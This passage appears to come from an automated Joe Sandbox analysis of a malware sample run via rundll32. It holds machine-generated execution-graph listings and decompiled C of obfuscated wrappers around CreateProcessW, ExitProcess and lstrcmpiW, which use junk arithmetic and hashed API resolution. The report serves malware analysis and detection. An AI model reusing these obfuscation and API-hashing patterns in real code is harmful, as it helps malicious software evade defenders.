4936->4935 4937->4935 4938->4935 4939->4935 4940->4935 4941->4935 4942->4935 5049 42f10f0 4943->5049 4945 42d3035 GetPEB 4955 42e2a46 4945->4955 4947 42d2043 GetPEB 4947->4955 4948 42ed617 GetPEB 4948->4955 4949 42d2654 GetPEB 4949->4955 4950 42e2e17 4954 42ea566 GetPEB 4950->4954 4951 42e2e15 4951->4269 4952 42ef6d3 GetPEB 4952->4955 4953 42e3fae GetPEB 4953->4955 4954->4951 4955->4945 4955->4947 4955->4948 4955->4949 4955->4950 4955->4951 4955->4952 4955->4953 4956 42ecaa8 2 API calls 4955->4956 4957 42e0387 GetPEB 4955->4957 4959 42f01ed GetPEB 4955->4959 4960 42d3f5c GetPEB 4955->4960 4961 42dab99 GetPEB 4955->4961 4962 42f0352 GetPEB 4955->4962 4963 42f25c3 GetPEB 4955->4963 5052 42dea72 4955->5052 5056 42d7283 4955->5056 4956->4955 4957->4955 4959->4955 4960->4955 4961->4955 4962->4955 4963->4955 4965 42ddfe3 4964->4965 4981 42dfcc9 4965->4981 4969 42e98d4 4968->4969 4970 42e9b60 4969->4970 4985 42d68df 4969->4985 4970->4870 4973 42d1ed4 GetPEB 4974 42e9b17 4973->4974 4974->4970 4975 42d1ed4 GetPEB 4974->4975 4975->4974 4977 42f069b 4976->4977 4978 42e9d10 GetPEB 4977->4978 4979 42f07ed 4977->4979 4989 42e7e0b 4977->4989 4978->4977 4979->4870 4982 42dfce8 4981->4982 4983 42d2309 GetPEB 4982->4983 4984 42de09b 4983->4984 4984->4866 4986 42d68fd 4985->4986 4987 42d2309 GetPEB 4986->4987 4988 42d6990 4987->4988 4988->4970 4988->4973 4990 42e7e2a 4989->4990 4991 42d2309 GetPEB 4990->4991 4992 42e7ec4 4991->4992 4992->4977 4994 42d2309 GetPEB 4993->4994 4995 42ee905 4994->4995 4995->4873 4997 42f0204 4996->4997 4998 42d419a GetPEB 4997->4998 4999 42f029e 4998->4999 4999->4873 5003 42f25dd 5000->5003 5002 42f2850 5004 42ea566 GetPEB 5002->5004 5003->5002 5005 42f284e 5003->5005 5006 42e199d GetPEB 5003->5006 5025 42ed551 5003->5025 5004->5005 5005->4873 5006->5003 5012 42da06d 5007->5012 5008 42ee867 GetPEB 5008->5012 5010 42da2da 5013 42ea566 GetPEB 5010->5013 5012->5008 5012->5010 5014 42da2d8 5012->5014 5029 42f0104 5012->5029 5033 42efc5c 5012->5033 5013->5014 5014->4873 5016 42ddaed 5015->5016 5017 42d5a31 GetPEB 5016->5017 5018 42ddeb0 5016->5018 5020 42dde94 5016->5020 5021 42d3f5c GetPEB 5016->5021 5024 42f0352 GetPEB 5016->5024 5041 42eff53 5016->5041 5045 42d2f36 5016->5045 5017->5016 5018->4873 5018->5018 5037 42ecfb7 5020->5037 5021->5016 5024->5016 5026 42ed578 5025->5026 5027 42d2309 GetPEB 5026->5027 5028 42ed601 5027->5028 5028->5003 5030 42f012a 5029->5030 5031 42d2309 GetPEB 5030->5031 5032 42f01d3 5031->5032 5032->5012 5034 42efc78 5033->5034 5035 42d2309 GetPEB 5034->5035 5036 42efd02 5035->5036 5036->5012 5038 42ecfcd 5037->5038 5039 42d2309 GetPEB 5038->5039 5040 42ed085 5039->5040 5040->5018 5042 42eff70 5041->5042 5043 42d2309 GetPEB 5042->5043 5044 42f001b 5043->5044 5044->5016 5046 42d2f75 5045->5046 5047 42d2309 GetPEB 5046->5047 5048 42d3012 5047->5048 5048->5016 5050 42d2309 GetPEB 5049->5050 5051 42f118a 5050->5051 5051->4955 5053 42deaa3 5052->5053 5054 42d2309 GetPEB 5053->5054 5055 42deb25 5054->5055 5055->4955 5057 42d72a9 5056->5057 5058 42df38a GetPEB 5057->5058 5059 42d755d 5057->5059 5060 42d755f 5057->5060 5058->5057 5059->4955 5061 42ebb18 GetPEB 5060->5061 5061->5059 5063 42ecd19 5062->5063 5064 42d2309 GetPEB 5063->5064 5065 42ecdda 5064->5065 5065->4291 5070 42e90e0 5066->5070 5069 42d2043 GetPEB 5069->5070 5070->5069 5071 42f343c GetPEB 5070->5071 5072 42df38a GetPEB 5070->5072 5073 42e9891 5070->5073 5074 42ea1d9 GetPEB 5070->5074 5077 42e98a4 5070->5077 5078 42d419a GetPEB 5070->5078 5079 42e9c25 5070->5079 5083 42d887a 5070->5083 5087 42ede17 5070->5087 5071->5070 5072->5070 5075 42d2043 GetPEB 5073->5075 5074->5070 5075->5077 5077->4291 5078->5070 5080 42e9c5f 5079->5080 5081 42d2309 GetPEB 5080->5081 5082 42e9cf1 5081->5082 5082->5070 5084 42d8896 5083->5084 5085 42d2309 GetPEB 5084->5085 5086 42d8923 5085->5086 5086->5070 5088 42ede42 5087->5088 5089 42d2309 GetPEB 5088->5089 5090 42ededd 5089->5090 5090->5070 5092 42ed48c 5091->5092 5093 42d2309 GetPEB 5092->5093 5094 42ed53e 5093->5094 5094->4302 5096 42dbfd7 5095->5096 5106 42e03d1 5096->5106 5099 42dc14c 5099->4319 5102 42ea566 GetPEB 5102->5099 5113 42d30f6 5103->5113 5107 42d2309 GetPEB 5106->5107 5108 42dc120 5107->5108 5108->5099 5109 42dbede 5108->5109 5110 42dbef9 5109->5110 5111 42d2309 GetPEB 5110->5111 5112 42dbfa2 5111->5112 5112->5102 5120 42d3123 5113->5120 5116 42d332b 5117 42ea566 GetPEB 5116->5117 5118 42d3329 5117->5118 5118->4319 5120->5116 5120->5118 5122 42d9db5 5120->5122 5125 42ef606 5120->5125 5129 42ea4a0 5120->5129 5133 42e1b54 5120->5133 5123 42d8934 GetPEB 5122->5123 5124 42d9e07 5123->5124 5124->5120 5126 42ef61c 5125->5126 5127 42d2309 GetPEB 5126->5127 5128 42ef6c5 5127->5128 5128->5120 5130 42ea4b7 5129->5130 5131 42d2309 GetPEB 5130->5131 5132 42ea557 5131->5132 5132->5120 5134 42d2309 GetPEB 5133->5134 5135 42e1c02 5134->5135 5135->5120 5142 42e523f 5136->5142 5138 42e548e 5139 42d5923 GetPEB 5138->5139 5140 42e54a8 5139->5140 5152 42e4baa 5140->5152 5141 42e548c 5141->4322 5142->5138 5142->5141 5148 42dbe19 5142->5148 5147 42f0352 GetPEB 5147->5141 5149 42dbe2f 5148->5149 5150 42d2309 GetPEB 5149->5150 5151 42dbed0 5150->5151 5151->5142 5161 42de16f 5152->5161 5156 42e4d82 5157 42e7a91 5156->5157 5158 42e7ab3 5157->5158 5159 42f2e95 GetPEB 5158->5159 5160 42e54dd 5159->5160 5160->5147 5162 42de18c 5161->5162 5163 42d2309 GetPEB 5162->5163 5164 42de20e 5163->5164 5164->5156 5165 42ea809 5164->5165 5166 42ea837 5165->5166 5167 42d2309 GetPEB 5166->5167 5168 42ea8db 5167->5168 5168->5156 5170 42e73dc 5169->5170 5171 42d2309 GetPEB 5170->5171 5172 42d4bd3 5171->5172 5172->4115 5174 42ee927 5173->5174 5175 42d2309 GetPEB 5174->5175 5176 42ee9da 5175->5176 5176->4346 5178 42d69c6 5177->5178 5179 42d2309 GetPEB 5178->5179 5180 42d6a62 5179->5180 5180->4346 5189 42d52ae 5181->5189 5182 42d3f5c GetPEB 5182->5189 5184 42eceb9 GetPEB 5184->5189 5185 42d53d4 5186 42e3d6e GetPEB 5185->5186 5187 42d53d2 5186->5187 5187->4346 5188 42f0352 GetPEB 5188->5189 5189->5182 5189->5184 5189->5185 5189->5187 5189->5188 5194 42e0490 5189->5194 5191 42eeb5c 5190->5191 5192 42d2309 GetPEB 5191->5192 5193 42eec0d 5192->5193 5193->4337 5195 42e04a9 5194->5195 5196 42d2309 GetPEB 5195->5196 5197 42e055b 5196->5197 5197->5189 5202 42d3c91 5203 42e3fae GetPEB 5202->5203 5204 42d3ed7 5203->5204 5205 42e17cb 2 API calls 5204->5205 5206 42d3eeb 5205->5206 5207 42d3f5c GetPEB 5206->5207 5214 42d3f4e 5206->5214 5208 42d3f06 5207->5208 5209 42dab99 GetPEB 5208->5209 5210 42d3f27 5209->5210 5211 42f0352 GetPEB 5210->5211 5212 42d3f36 5211->5212 5213 42ef790 GetPEB 5212->5213 5213->5214 3918 42e43b3 3919 42e4473 3918->3919 3920 42e449e 3918->3920 3924 42d441e 3919->3924 3925 42d48e6 3924->3925 3927 42d4ac5 3925->3927 3929 42d4ac3 3925->3929 3934 42d3f5c GetPEB 3925->3934 3935 42f0352 GetPEB 3925->3935 3940 42e17cb 3925->3940 3944 42d3035 3925->3944 3958 42ed617 3925->3958 3962 42dab99 3925->3962 3966 42f1988 3925->3966 3969 42d5a31 3925->3969 3948 42ecaa8 3927->3948 3929->3920 3937 42d4248 3929->3937 3934->3925 3935->3925 3938 42d2309 GetPEB 3937->3938 3939 42d42ec ExitProcess 3938->3939 3939->3920 3941 42e17e1 3940->3941 3973 42d2309 3941->3973 3945 42d3054 3944->3945 3946 42d2309 GetPEB 3945->3946 3947 42d30e3 3946->3947 3947->3925 3949 42ecacf 3948->3949 3950 42d5a31 GetPEB 3949->3950 3951 42ecc5c 3950->3951 4003 42f31d2 3951->4003 3953 42ecc95 3954 42ecca0 3953->3954 4007 42ea566 3953->4007 3954->3929 3957 42ea566 GetPEB 3957->3954 3959 42ed631 3958->3959 4011 42f07fc 3959->4011 3963 42dabbd 3962->3963 4015 42f2e95 3963->4015 3967 42d2309 GetPEB 3966->3967 3968 42f1a33 3967->3968 3968->3925 3970 42d5a4b 3969->3970 4018 42e7c86 3970->4018 3974 42d23fb lstrcmpiW 3973->3974 3975 42d23d4 3973->3975 3974->3925 3979 42ebec9 3975->3979 3977 42d23e6 3982 42ea607 3977->3982 3986 42ede10 GetPEB 3979->3986 3981 42ebfaa 3981->3977 3984 42ea62c 3982->3984 3983 42ea6e6 3983->3974 3984->3983 3987 42eb1b5 3984->3987 3986->3981 3988 42eb31e 3987->3988 3995 42de902 3988->3995 3991 42eb360 3993 42eb38e 3991->3993 3994 42ea607 GetPEB 3991->3994 3993->3983 3994->3993 3996 42de915 3995->3996 3997 42d2309 GetPEB 3996->3997 3998 42de9bb 3997->3998 3998->3991 3999 42e9d10 3998->3999 4000 42e9d20 3999->4000 4001 42d2309 GetPEB 4000->4001 4002 42e9d95 4001->4002 4002->3991 4004 42f3205 4003->4004 4005 42d2309 GetPEB 4004->4005 4006 42f32a6 CreateProcessW 4005->4006 4006->3953 4008 42ea576 4007->4008 4009 42d2309 GetPEB 4008->4009 4010 42ea5fb 4009->4010 4010->3957 4012 42f0824 4011->4012 4013 42d2309 GetPEB 4012->4013 4014 42ed69c 4013->4014 4014->3925 4016 42d2309 GetPEB 4015->4016 4017 42dabd7 4016->4017 4017->3925 4019 42e7ca1 4018->4019 4022 42f2f5c 4019->4022 4023 42f2f7b 4022->4023 4024 42d2309 GetPEB 4023->4024 4025 42d5aa9 4024->4025 4025->3925 5215 42efd10 5216 42efe4b 5215->5216 5217 42d5923 GetPEB 5216->5217 5222 42efe91 5216->5222 5218 42efe65 5217->5218 5223 42ebd84 5218->5223 5221 42f0352 GetPEB 5221->5222 5226 42ebd9f 5223->5226 5224 42ebe97 5224->5221 5226->5224 5227 42f2869 5226->5227 5228 42f2882 5227->5228 5229 42d2309 GetPEB 5228->5229 5230 42f291c 5229->5230 5230->5226

                                                                                                        Executed Functions

                                                                                                        Function 042F31D2, Relevance: 1.6, APIs: 1, Instructions: 77processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 63 42f31d2-42f32c2 call 42f2523 call 42d2309 CreateProcessW
                                                                                                        C-Code - Quality: 53%
                                                                                                        			E042F31D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E042F2523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E042D2309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}













                                                                                                        0x042f31da
                                                                                                        0x042f31df
                                                                                                        0x042f31e1
                                                                                                        0x042f31e4
                                                                                                        0x042f31e7
                                                                                                        0x042f31e8
                                                                                                        0x042f31e9
                                                                                                        0x042f31ec
                                                                                                        0x042f31ef
                                                                                                        0x042f31f2
                                                                                                        0x042f31f3
                                                                                                        0x042f31f4
                                                                                                        0x042f31f7
                                                                                                        0x042f31fa
                                                                                                        0x042f31fd
                                                                                                        0x042f31fe
                                                                                                        0x042f3200
                                                                                                        0x042f3205
                                                                                                        0x042f320f
                                                                                                        0x042f3214
                                                                                                        0x042f321b
                                                                                                        0x042f321f
                                                                                                        0x042f3223
                                                                                                        0x042f322a
                                                                                                        0x042f3231
                                                                                                        0x042f3235
                                                                                                        0x042f3241
                                                                                                        0x042f3249
                                                                                                        0x042f324c
                                                                                                        0x042f3253
                                                                                                        0x042f325a
                                                                                                        0x042f325e
                                                                                                        0x042f3265
                                                                                                        0x042f326c
                                                                                                        0x042f3273
                                                                                                        0x042f327a
                                                                                                        0x042f3281
                                                                                                        0x042f32a1
                                                                                                        0x042f32bb
                                                                                                        0x042f32c2

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 042F32BB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, Offset: 042D0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.715062652.00000000042D0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.715130518.00000000042F5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.715162308.00000000042F7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_42d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
                                                                                                        • Instruction ID: 27af09bca012bde542314b50bd955fe83969fa901e29a17397abfb17b186d2b5
                                                                                                        • Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
                                                                                                        • Instruction Fuzzy Hash: 06311672901248BBCF65DF96CD09CDFBFB5FB89704F108188F91462220D3B58A60DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 042D4248, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 68 42d4248-42d42f6 call 42d2309 ExitProcess
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E042D4248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E042D2309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}












                                                                                                        0x042d424e
                                                                                                        0x042d4254
                                                                                                        0x042d425b
                                                                                                        0x042d4262
                                                                                                        0x042d4269
                                                                                                        0x042d4272
                                                                                                        0x042d4277
                                                                                                        0x042d427c
                                                                                                        0x042d4283
                                                                                                        0x042d428a
                                                                                                        0x042d4291
                                                                                                        0x042d4298
                                                                                                        0x042d42a2
                                                                                                        0x042d42aa
                                                                                                        0x042d42ad
                                                                                                        0x042d42b1
                                                                                                        0x042d42b5
                                                                                                        0x042d42bc
                                                                                                        0x042d42c3
                                                                                                        0x042d42c7
                                                                                                        0x042d42e7
                                                                                                        0x042d42f1

                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 042D42F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, Offset: 042D0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.715062652.00000000042D0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.715130518.00000000042F5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.715162308.00000000042F7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_42d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
                                                                                                        • Instruction ID: f3dcbc7de2dd5b5a1305b06243d406fd89a2ccd52328f6de302e569e23a07b24
                                                                                                        • Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
                                                                                                        • Instruction Fuzzy Hash: 9D1128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 042E17CB, Relevance: 1.3, APIs: 1, Instructions: 56stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 71 42e17cb-42e1893 call 42f2523 call 42d2309 lstrcmpiW
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E042E17CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E042F2523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E042D2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}














                                                                                                        0x042e17d2
                                                                                                        0x042e17d5
                                                                                                        0x042e17d7
                                                                                                        0x042e17db
                                                                                                        0x042e17dc
                                                                                                        0x042e17e1
                                                                                                        0x042e17e8
                                                                                                        0x042e17f1
                                                                                                        0x042e17f8
                                                                                                        0x042e17ff
                                                                                                        0x042e1803
                                                                                                        0x042e1807
                                                                                                        0x042e180e
                                                                                                        0x042e181b
                                                                                                        0x042e1822
                                                                                                        0x042e1825
                                                                                                        0x042e182c
                                                                                                        0x042e1833
                                                                                                        0x042e1844
                                                                                                        0x042e1847
                                                                                                        0x042e1859
                                                                                                        0x042e185c
                                                                                                        0x042e1863
                                                                                                        0x042e186a
                                                                                                        0x042e186e
                                                                                                        0x042e1881
                                                                                                        0x042e188d
                                                                                                        0x042e1893

                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 042E188D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, Offset: 042D0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.715062652.00000000042D0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.715130518.00000000042F5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000006.00000002.715162308.00000000042F7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_42d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1586166983-0
                                                                                                        • Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction ID: df64d5247886e04b468d1ee3420de8b3b65ca9bcc695641b30c5cc21e3f34145
                                                                                                        • Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction Fuzzy Hash: 5B2124B5D1020CFFDB08DFA4C94A9EEBBB4EB44304F208199E425B7240E3B56B049FA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Analysis Process: rundll32.exe PID: 3476 Parent PID: 4928 rundll32.exeCOMMON

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:29.8%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0.6%
                                                                                                        Total number of Nodes:1092
                                                                                                        Total number of Limit Nodes:33

                                                                                                        Graph

                                                                                                        execution_graph 5199 4ed1956 5200 4ed196c 5199->5200 5201 4ed1ed4 GetPEB 5200->5201 5202 4ed1a02 5201->5202 3903 4ef32c3 3908 4ee577e 3903->3908 3905 4ef3355 3945 4ed4248 3905->3945 3937 4ee6ada 3908->3937 3909 4ef2524 RtlAllocateHeap GetPEB 3909->3937 3910 4ee6e5e 3910->3905 3917 4ee73a8 4164 4ef292b 3917->4164 3920 4edd10c RtlAllocateHeap GetPEB 3920->3937 3930 4ee6e3c 4060 4edf41f 3930->4060 3937->3909 3937->3910 3937->3917 3937->3920 3937->3930 3938 4ed2043 RtlFreeHeap GetPEB 3937->3938 3944 4ef0352 RtlFreeHeap GetPEB 3937->3944 3948 4ed9384 3937->3948 3961 4ee2fa2 3937->3961 3971 4eea8f0 3937->3971 3980 4eedef4 3937->3980 3990 4ee748a 3937->3990 3997 4ee78a5 3937->3997 4002 4ed3845 3937->4002 4013 4eea370 3937->4013 4017 4ef18d2 3937->4017 4021 4ed55e8 3937->4021 4030 4eeece3 3937->4030 4038 4ed6fc4 3937->4038 4044 4ed2e17 3937->4044 4049 4eed99a 3937->4049 4071 4eebfe8 3937->4071 4083 4ee4e8a 3937->4083 4092 4ee056a 3937->4092 4103 4ed2a46 3937->4103 4113 4ed43a2 3937->4113 4116 4ed6b25 3937->4116 4128 4eda3df 3937->4128 4141 4ee399b 3937->4141 4144 4ede21c 3937->4144 4151 4ed1a0a 3937->4151 4155 4ed4af2 3937->4155 4160 4eef086 3937->4160 3938->3937 3944->3937 3946 4ed2309 GetPEB 3945->3946 3947 4ed42ec 3946->3947 3949 4ed987e 3948->3949 3950 4ed9a11 3949->3950 3956 4ed9a0f 3949->3956 3957 4edf38a RtlAllocateHeap GetPEB 3949->3957 4179 4ed3f5c 3949->4179 4183 4ee54fd 3949->4183 4187 4ef0352 3949->4187 4191 4ee7ad8 3949->4191 4195 4ed2153 3949->4195 4199 4ed2043 3950->4199 3955 4ed2043 2 API calls 3955->3956 3956->3937 3957->3949 3963 4ee2fdd 3961->3963 3964 4ee372a 3963->3964 3968 4ed2043 RtlFreeHeap GetPEB 3963->3968 4251 4ef0b34 3963->4251 4261 4edac95 3963->4261 4278 4ee0ade 3963->4278 4297 4ee9da1 3963->4297 4306 4edd223 3963->4306 4318 4ed5a31 3963->4318 3964->3937 3968->3963 3972 4eea90a 3971->3972 3975 4eeaaad 3972->3975 3976 4eeaaaf 3972->3976 3979 4edf38a 2 API calls 3972->3979 4482 4ed89d8 3972->4482 4486 4ee3ce1 3972->4486 4490 4eef14d 3972->4490 3975->3937 3978 4ed2043 2 API calls 3976->3978 3978->3975 3979->3972 3983 4eee1ed 3980->3983 3984 4eee292 3983->3984 3986 4edf38a 2 API calls 3983->3986 3989 4eee2a3 3983->3989 4600 4eefe9d 3983->4600 4604 4ed3035 3983->4604 4608 4ed9e22 3983->4608 4615 4ef343c 3983->4615 4619 4eed617 3984->4619 3986->3983 3989->3937 3993 4ee7669 3990->3993 3991 4edf38a 2 API calls 3991->3993 3992 4ee76c6 4631 4ee38ca 3992->4631 3993->3991 3993->3992 3996 4ee76c4 3993->3996 4635 4ed42f7 3993->4635 3996->3937 4001 4ee79b1 3997->4001 3999 4ee7a84 3999->3937 4001->3999 4676 4ede0a2 4001->4676 4680 4ee56bd 4001->4680 4003 4ed3ad9 4002->4003 4004 4ed2043 2 API calls 4003->4004 4006 4ed3c8c 4003->4006 4010 4ed3b0f 4003->4010 4684 4ee3c23 4003->4684 4692 4ef1988 4003->4692 4695 4ee7d44 4003->4695 4699 4ed9a57 4003->4699 4004->4003 4006->4006 4688 4edabdf 4010->4688 4014 4eea38a 4013->4014 4015 4eea49b 4014->4015 4016 4ef08d1 RtlAllocateHeap RtlFreeHeap LoadLibraryW GetPEB 4014->4016 4015->3937 4016->4014 4018 4ef18eb 4017->4018 4019 4ed2309 GetPEB 4018->4019 4020 4ef197a 4019->4020 4020->3937 4028 4ed583b 4021->4028 4022 4ed3f5c 2 API calls 4022->4028 4023 4ed58f3 4710 4edc5fe 4023->4710 4024 4ed58f1 4024->3937 4027 4ee3fae GetPEB 4027->4028 4028->4022 4028->4023 4028->4024 4028->4027 4029 4ef0352 2 API calls 4028->4029 4722 4edab99 4028->4722 4029->4028 4036 4eeef44 4030->4036 4032 4eed617 GetPEB 4032->4036 4033 4ee199d 2 API calls 4033->4036 4035 4eef055 4035->3937 4036->4032 4036->4033 4036->4035 4037 4eea566 2 API calls 4036->4037 4742 4eed46d 4036->4742 4746 4ef3370 4036->4746 4037->4036 4042 4ed7163 4038->4042 4041 4ed7241 4041->3937 4042->4041 4043 4ee3fae GetPEB 4042->4043 4750 4edbfb6 4042->4750 4758 4ee3a85 4042->4758 4043->4042 4045 4ed2ee6 4044->4045 4047 4edf38a 2 API calls 4045->4047 4048 4ed2f2c 4045->4048 4794 4ee5220 4045->4794 4047->4045 4048->3937 4050 4ed8934 GetPEB 4049->4050 4056 4eedcc3 4050->4056 4051 4ed3f5c RtlAllocateHeap GetPEB 4051->4056 4053 4eedcf2 4827 4ed4c00 4053->4827 4055 4eedd13 4055->3937 4056->4051 4056->4053 4056->4055 4058 4edab99 GetPEB 4056->4058 4059 4ef0352 RtlFreeHeap GetPEB 4056->4059 4841 4ed419a 4056->4841 4844 4ee0387 4056->4844 4058->4056 4059->4056 4061 4edf441 4060->4061 4062 4ed3035 GetPEB 4061->4062 4063 4edf944 4061->4063 4064 4ed3f5c RtlAllocateHeap GetPEB 4061->4064 4065 4edfaec 4061->4065 4069 4ef0352 RtlFreeHeap GetPEB 4061->4069 4070 4ee2f01 GetPEB 4061->4070 4862 4eeeaac 4061->4862 4062->4061 4852 4eecaa8 4063->4852 4064->4061 4065->4065 4069->4061 4070->4061 4075 4eec705 4071->4075 4072 4eef6d3 GetPEB 4072->4075 4073 4ed3035 GetPEB 4073->4075 4074 4ed3f5c RtlAllocateHeap GetPEB 4074->4075 4075->4072 4075->4073 4075->4074 4076 4eec96e 4075->4076 4078 4ee2f01 GetPEB 4075->4078 4081 4eec96c 4075->4081 4082 4ef0352 RtlFreeHeap GetPEB 4075->4082 4870 4eeceb9 4075->4870 4874 4eee35d 4075->4874 4878 4ee3d6e 4076->4878 4078->4075 4081->3937 